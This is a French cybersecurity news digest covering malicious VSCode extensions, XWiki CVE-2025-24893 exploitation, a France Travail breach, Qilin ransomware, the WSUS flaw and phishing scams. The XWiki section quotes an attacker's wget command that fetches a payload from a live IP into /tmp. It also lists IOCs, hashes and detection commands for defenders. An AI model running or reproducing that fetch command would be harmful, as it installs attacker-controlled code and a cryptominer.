HelixGuard Team publie une analyse mettant en lumière une campagne d’abus de l’écosystème d’extensions VSCode (Microsoft Marketplace et OpenVSX), identifiant 12 composants malveillants — dont 4 toujours non retirés — et détaillant leurs comportements, canaux d’exfiltration et adresses C2.

Extensions et statuts:

Non retirées: Christine-devops1234.scraper (1.0.3–1.0.7), Kodease.fyp-23-s2-08 (0.10.0), GuyNachshon.cxcx123 (0.0.1), sahil92552.CBE-456 (0.0.2–0.0.6)

Retirées: teste123444212.teste123444212, Solorzano-JuanJose.fake-extension-test, ToToRoManComp.diff-tool-vsc, Deriv-AI.deriv-ai, EMM.emmpilot, CodeRanger.ncsu-csc111, BX-Dev.Blackstone-DLP, VKTeam.ru

Source: Wordfence (blog). Wordfence décrit une vulnérabilité de lecture arbitraire de fichiers dans le plugin WordPress Anti‑Malware Security and Brute‑Force Firewall (100 000+ installations), exploitable par des comptes authentifiés au niveau abonné et corrigée en version 4.23.83.(publiée le 15/10/2025).

👇

https://wordpress.org/plugins/gotmls/#developers

Microsoft Azure, deuxième plateforme cloud (informatique à distance) au monde, connaît des perturbations depuis 17 heures, heure de Paris, rapporte mercredi 29 octobre son site de maintenance, affectant, entre autres, des jeux en ligne ou des services de compagnies aériennes et ferroviaires.

...

Il survient une semaine après une panne mondiale de plus grande ampleur qui a touché son concurrent AWS, la filiale d’Amazon qui domine le marché du cloud, devenu l’épine dorsale des services informatiques en ligne sur laquelle repose une large part de l’économie mondiale.

France Travail a été victime d'une cyberattaque lundi, a appris mercredi 29 octobre franceinfo auprès de l'établissement public. "Selon nos premières investigations, des données ont en effet été extraites", explique France Travail, sans être "en mesure de confirmer le volume des demandeurs d’emploi concernés, ni de confirmer la nature des données" piratées.

⚠️ Vulnérabilité XWiki CVE-2025-24893 activement exploitée

Une faille critique dans XWiki (CVE-2025-24893) est exploitée activement sur internet. Elle permet une injection de template non authentifiée pouvant conduire à l’exécution de code à distance (RCE). Des attaquants s’en servent actuellement pour installer un mineur de cryptomonnaie.

🧩 Ce qui se passe

Selon VulnCheck , leurs “canaries” ont observé une chaîne d’exploitation en deux étapes :

Première étape : L’attaquant dépose un petit script (x640) dans /tmp/. Exemple :

wget http://193.32.208.24:8080/7I2l42wlAe/x640 -O /tmp/11909

Deuxième étape (20 min plus tard) : Il exécute ce script, qui télécharge et lance deux autres (x521 et x522). Ceux-ci installent puis démarrent un mineur de cryptomonnaie appelé tcrond, configuré pour se connecter à c3pool.org.

Le malware nettoie ensuite la machine (historique, processus concurrents, etc.) pour monopoliser les ressources CPU.

🚨 Détails techniques & indicateurs (IOCs)

IPs observées :

• 123.25.249.88 (Vietnam)

• 193.32.208.24 (héberge les payloads)

Fichiers et scripts malveillants :

• /tmp/11909

• x640, x521, x522

• binaire : tcrond (mineur UPX-packed)

Hashes connus :

tcrond (UPX): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10 tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f x640: 5abc337dbc04fee7206956dad1e0b6d43921a868

🔍 Vérifications rapides

Sur un serveur XWiki, exécutez :

find /tmp /var/tmp -type f -mtime -2 -ls
ps aux | egrep 'tcrond|xmrig|kinsing|kdevtmpfsi|nanopool'
ss -tunp | egrep '193\.32\.208\.24|123\.25\.249\.88'

⚙️ Si vous trouvez /tmp/11909 ou un binaire tcrond, la machine est probablement compromise. Isolez-la, collectez les journaux, puis réinstallez à partir d’une source propre.

🛡️ Mesures recommandées

Mettre à jour XWiki dès qu’un correctif officiel est disponible.

Restreindre l’accès à /bin/get/Main/SolrSearch via un proxy ou un WAF.

Bloquer les IPs observées (pare-feu, IDS).

Surveiller les logs pour des requêtes contenant {{groovy}} ou wget ... /tmp/.

Sources:

👇

XWiki CVE-2025-24893 Exploited in the Wild

👇

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j

Les chercheurs de Kaspersky ont détecté en début d'année une campagne de cyberespionnage contre des organisations russes, basée sur l'exploitation d'une vulnérabilité 0-day dans Google Chrome. Après avoir remonté la chaîne d'attaque, ils ont relié le malware utilisé au logiciel espion “Dante”, développé et commercialisé par la société italienne Memento Labs (ex-HackingTeam).

Pour échapper à la détection des outils de sécurité, le gang de ransomware Qilin a été observé en train d'utiliser une nouvelle technique : l'utilisation de Windows Subsystem for Linux (WSL) pour exécuter son module de chiffrement des données créé pour Linux.

Le ransomware Qilin, apparu pour la première fois en août 2022 et initialement nommé Agenda, est actuellement l’une des menaces les plus redoutables. D’après les recherches de Trend Micro et Cisco Talos, ce gang de ransomware Qilin serait à l'origine de plus de 700 victimes réparties dans 62 pays au cours de l’année 2025. Depuis cet été, on parle d'une moyenne de 40 nouvelles victimes publiées chaque mois.

Watch on Video channel logo Les affiliés de Qilin ont d'ailleurs pour habitude de détourner l'utilisation d'outils légitimes pour s'introduire dans les réseaux des entreprises. On peut notamment donner les exemples suivants :

• Outils de prise de contrôle à distance comme AnyDesk, ScreenConnect, Splashtop.
• Applications utilisées pour l’exfiltration de données : Cyberduck, WinRAR.
• Des utilitaires intégrés à Windows comme Paint ou Bloc-notes pour visualiser les documents avant de les exfiltrer.

• Microsoft prêche contre BinaryFormatter depuis 5 ans mais l'utilise en secret dans WSUS : 500 000 serveurs exposés à une faille critique exploitée massivement
• Un attaquant non authentifié peut prendre le contrôle total d'un serveur Windows avec privilèges SYSTEM en envoyant simplement un cookie malveillant
• Microsoft déprécie discrètement WSUS un an avant que la faille n'éclate : coïncidence ou savaient-ils que leur code zombie allait exploser ?

Des escrocs publient de fausses annonces de location d'appartements ou de maisons, qui ne sont en réalité pas à louer. Lorsqu’une personne est intéressée, le prétendu propriétaire explique qu’il se trouve à l’étranger, rendant impossible toute visite du bien. Il est alors demandé à la victime de verser un acompte ou une caution via la plateforme Airbnb, «par mesure de sécurité». Un lien est ensuite envoyé, dirigeant vers un site qui ressemble comme deux gouttes d'eau à celui d'Airbnb. Il s’agit en réalité d’un faux site et d'une tentative de phishing. Une fausse facture est ensuite générée, demandant un paiement sur un compte privé à l’étranger.

Votre entreprise stocke ses données chez Amazon Web Services. Vos employés utilisent Microsoft 365. Vos développeurs codent avec des outils américains. Vos serveurs tournent sur des processeurs taïwanais. Vos services d’intelligence artificielle s’appuient sur ChatGPT ou Claude.

Posez-vous cette question : que se passerait-il si ces technologies devenaient inaccessibles demain ?

Alors que l’Europe accélère sa transition énergétique, un nouveau risque de dépendance apparaît. La majorité des équipements solaires installés sur le continent, notamment les onduleurs, provient de Chine. Une situation qui soulève des inquiétudes croissantes en matière de souveraineté industrielle et de cybersécurité.

Après le gaz russe, l'Europe risque-t-elle d'être de nouveau trop dépendante d'une puissance étrangère pour ses besoins énergétiques ? Selon le média Politico, la réponse est oui. Mais il ne s'agit pas de gaz, ni de carburant. Le problème se trouve directement au niveau de la production d'électricité, et plus spécifiquement le solaire.

Dans un rapport publié le 23 octobre 2025, la société de services réseaux Infoblox met en lumière la face cachée du navigateur Universe Browser. L’outil, téléchargé des millions de fois, promettait à ses utilisateurs un respect de leur vie privée et la possibilité de contourner la censure dans les pays où les jeux d’argent en ligne sont interdits. Entre escroqueries à échelle industrielle, opérations de fraude générant des dizaines de milliards de dollars par an et trafics d’êtres humains, les réseaux cybercriminels d’Asie du Sud-Est ne cessent d’inquiéter les autorités internationales.